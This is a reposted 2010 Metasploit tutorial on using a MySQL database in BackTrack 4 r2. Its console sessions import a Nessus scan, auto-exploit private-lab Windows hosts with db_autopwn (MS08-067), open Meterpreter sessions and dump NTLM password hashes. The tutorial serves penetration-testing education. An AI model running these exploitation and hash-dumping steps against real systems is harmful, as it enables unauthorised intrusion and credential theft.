首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
Metasploit with MYSQL in BackTrack 4 r2
来源:vfocus.net 作者:vfocus 发布时间:2010-12-27  

Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.

root@bt:~# msfconsole

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ ----=[635 exploits - 316 auxiliary
+ ----=[215 payloads - 27 encoders - 8 nops
=[svn r11078 updated today (2010.11.19)

msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3

We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.

msf > db_driver mysql
[*] Using database driver mysql
msf >/etc/init.d/mysql start
[*]exec: /etc/init.d/mysql start

Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*]    Usage: db_connect @/
[*]       OR: db_connect -y[path/to/database.yml]
[*] Examples:
[*]        db_connect user@metasploit3
[*]        db_connect user:pass@192.168.0.2/metasploit3
[*]        db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3

In order to have some hosts to use as targets and to show the information we can add to the database, we import a previously run Nessus scan using the db_import command. Metasploit will automatically detect the filetype and import it for us.

msf > db_import /root/nessus_report_EDB.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.69.50
[*] Importing host 192.168.69.199
[*] Importing host 192.168.69.175
[*] Importing host 192.168.69.173
[*] Importing host 192.168.69.171
[*] Importing host 192.168.69.146
[*] Importing host 192.168.69.143
[*] Importing host 192.168.69.142
[*] Importing host 192.168.69.141
[*] Importing host 192.168.69.140
[*] Importing host 192.168.69.130
[*] Importing host 192.168.69.110
[*] Importing host 192.168.69.105
[*] Importing host 192.168.69.100
[*] Successfully imported /root/nessus_report_EDB.nessus

After the successful import, our database should be populated with a number of hosts. Running db_hosts will query the database and allow us to customize the output.

msf > db_hosts -h
Usage: db_hosts [-h|--help][-u|--up][-a ][-c
][-o output-file ]

-a   Search for a list of addresses
-c
Only show the given columns
-h,--help         Show this help information
-u,--up           Only show hosts which are up
-o          Send output to a filein csv format

Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at

msf > db_hosts -c address,mac

Hosts
=====

address         mac
-------         ---
192.168.69.100  00:0C:29:DE:1A:00
192.168.69.105  00:0C:29:9A:FC:E0
192.168.69.110  00:0C:29:69:9C:44
192.168.69.130  00:0C:29:6E:26:BB
192.168.69.140
192.168.69.141  00:0C:29:F3:40:70
192.168.69.142  00:0C:29:57:63:E2
192.168.69.143  00:0C:29:32:29:79
192.168.69.146
192.168.69.171  00:0C:29:EC:23:47
192.168.69.173  00:0C:29:45:7D:33
192.168.69.175  00:0C:29:BB:38:53
192.168.69.199  00:0C:29:58:09:DA
192.168.69.50

Far more interesting than IP and MAC addresses are what services are running on our target systems which is what db_services will show us.

msf > db_services -h

Usage: db_services [-h|--help][-u|--up][-a ][-r
][-p
][-n ]

-a   Search for a list of addresses
-c
Only show the given columns
-h,--help         Show this help information
-n   Search for a list of service names
-p
Search for a list of ports
-r
Only show [tcp|udp] services
-u,--up           Only show services which are up

Available columns: created_at, info, name, port, proto, state, updated_at

msf > db_services -c name,port,proto

Services
========

name            port   proto  Host            Workspace
----            ----   -----  ----            ---------
192.168.69.100  123    udp    192.168.69.100  default
192.168.69.100  135    tcp    192.168.69.100  default
192.168.69.100  137    udp    192.168.69.100  default
192.168.69.100  139    tcp    192.168.69.100  default
192.168.69.100  445    tcp    192.168.69.100  default
192.168.69.100  3389   tcp    192.168.69.100  default
192.168.69.105  123    udp    192.168.69.105  default
...snip...

Most interesting of all is the list of vulnerabilities that are mapped to our specific targets as found in the vulnerability scan. The db_vulns command will list the vulnerabilities along with their corresponding reference numbers, if applicable.

msf > db_vulns
[*] Time: Sat Nov 2020:21:37 UTC 2010 Vuln: host=192.168.69.50 name=NSS- refs=
[*] Time: Sat Nov 2020:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445proto=tcp name=NSS-26920refs=CVE-1999-0519,CVE-1999-0520,CVE-2002-1117,BID-494,OSVDB-299
[*] Time: Sat Nov 2020:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445proto=tcp name=NSS-26919refs=CVE-1999-0505
...snip...

For the sake of brevity, we will just let db_autopwn exploit the low-hanging fruit for us and only run exploits with at least a “good” rating.

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI[range] Only exploit hosts with these ports open
-PX[range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -x-e-R good
[*](1/30[0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.69.175:139...
[*](2/30[0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.69.175:139...
...snip...
[*] Meterpreter session 1 opened (192.168.69.140:54342 -> 192.168.69.105:34160) at Sat Nov 2015:45:24-05002010
[*] Meterpreter session 2 opened (192.168.69.140:53895 -> 192.168.69.100:30423) at Sat Nov 2015:45:24-05002010
[*](30/30[2 sessions]): Waiting on 2 launched modules to finish execution...
[*](30/30[2 sessions]): Waiting on 0 launched modules to finish execution...

In a brief amount of time, Metasploit has delivered 2 Meterpreter sessions to us.

msf > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
--  ----                   -----------                            ----------
1   meterpreter x86/win32                                         192.168.69.140:54342 -> 192.168.69.105:34160
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ V-XPSP2-TEMPLAT  192.168.69.140:53895 -> 192.168.69.100:30423

Running db_exploited now will list not only the hosts that were exploited but also the port and exploit that was successful against them.

msf > db_exploited
[*] Time: Sat Nov 2020:45:24 UTC 2010 Host Info: host=192.168.69.105 port=445proto=tcp sname=192.168.69.105 exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: Sat Nov 2020:45:24 UTC 2010 Host Info: host=192.168.69.100 port=445proto=tcp sname=192.168.69.100 exploit=exploit/windows/smb/ms08_067_netapi
[*] Found 2 exploited hosts.

Post exploitation is critical and you can frequently make use of credentials gathered to penetrate deeper into a target network. Metasploit has the db_add_cred command that allows you to insert credentials into the database as you come across them during your engagement.

msf > sessions -i1
[*] Starting interaction with 1...

meterpreter > hashdump
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:616bd5bd6c74fb1e2207c34e6ce1c14f:fc631be480c73a749c15e311b8b877fd:::
lab:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:adc54aedfc47352ef9e20da3dd86ca63:::
meterpreter >
Background session 1? [y/N]
msf > db_add_cred 192.168.69.105 445 Administrator Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: Sat Nov 2020:54:36 UTC 2010 Credential: host=192.168.69.105 port=445proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > db_creds
[*] Time: Sat Nov 2020:54:36 UTC 2010 Credential: host=192.168.69.105 port=445proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
[*] Found 1 credential.
msf >

All of these database features are very powerful and exciting but just as exciting is that your entire session is now available with MYSQL.

root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands endwith;or \g.
Your MySQL connection id is56
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type'help;'or'\h' for help. Type'\c'to clear the buffer.

mysql>use msf3;
Reading table information for completion of tableandcolumn names
You can turn off this feature to get a quicker startup with-A

Database changed
mysql>showtables;
+-----------------------------+
| Tables_in_msf3              |
+-----------------------------+
| attachments                 |
| attachments_email_templates |
| campaigns                   |
| clients                     |
| creds                       |
| email_addresses             |
| email_templates             |
| events                      |
| exploited_hosts             |
| hosts                       |
| imported_creds              |
| loots                       |
| notes                       |
| project_members             |
| refs                        |
| report_templates            |
| reports                     |
| schema_migrations           |
| services                    |
| tasks                       |
| users                       |
| vulns                       |
| vulns_refs                  |
| web_forms                   |
| web_pages                   |
| web_sites                   |
| web_templates               |
| web_vulns                   |
| wmap_requests               |
| wmap_targets                |
| workspaces                  |
+-----------------------------+
31 rows inset(0.00 sec)

We can now perform queries to access all of the information gathered on exploited hosts, gathered credentials, and much more.

mysql>select*from exploited_hosts;
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| id | host_id | service_id | session_uuid | name                                | payload                              | created_at          | updated_at          |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
|  1|      14|        131| oc5vd2zl     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp |2010-11-2020:45:24|2010-11-2020:45:24|
|  2|      15|        137| qwtwtqfj     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp |2010-11-2020:45:24|2010-11-2020:45:24|
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
2 rows inset(0.00 sec)

mysql>select*from creds;
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| id | service_id | created_at          | updated_at          |user          | pass                                                                                   | active | proof | ptype    | source_id | source_type |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
|  1|        131|2010-11-2020:54:36|2010-11-2020:54:36| Administrator | Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: |      1|NULL  |password|      NULL|NULL        |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
1 rows inset(0.00 sec)

mysql>

At first glance, database integration is not that compelling but it opens the door for the community to develop customized reporting apps using such a widely used database like MYSQL easing the post-penetration test reporting burden.

For further details on setting up and using the various databases in Metasploit, check out the Configuring Databases and Using the MSF Database sections in Metasploit Unleashed.



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·啊江统计系统V1.6 版本后台拿SHE
·The Operation Outbreak Attack
·另类网站入侵之一句话木马图片的
·Exploitation Without A TTY
·长达1年半的一次艰难渗透
·Windows系统密码破解全攻略(hash
·时间和状态:利用漏洞改变游戏角
·暴力破解asp一句话[php版]
·GRE数据包注入攻击
·oracle低权限下获取shell
·WebLogic简单抓鸡大法
·各种渗透,提权的经验和技巧总结
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved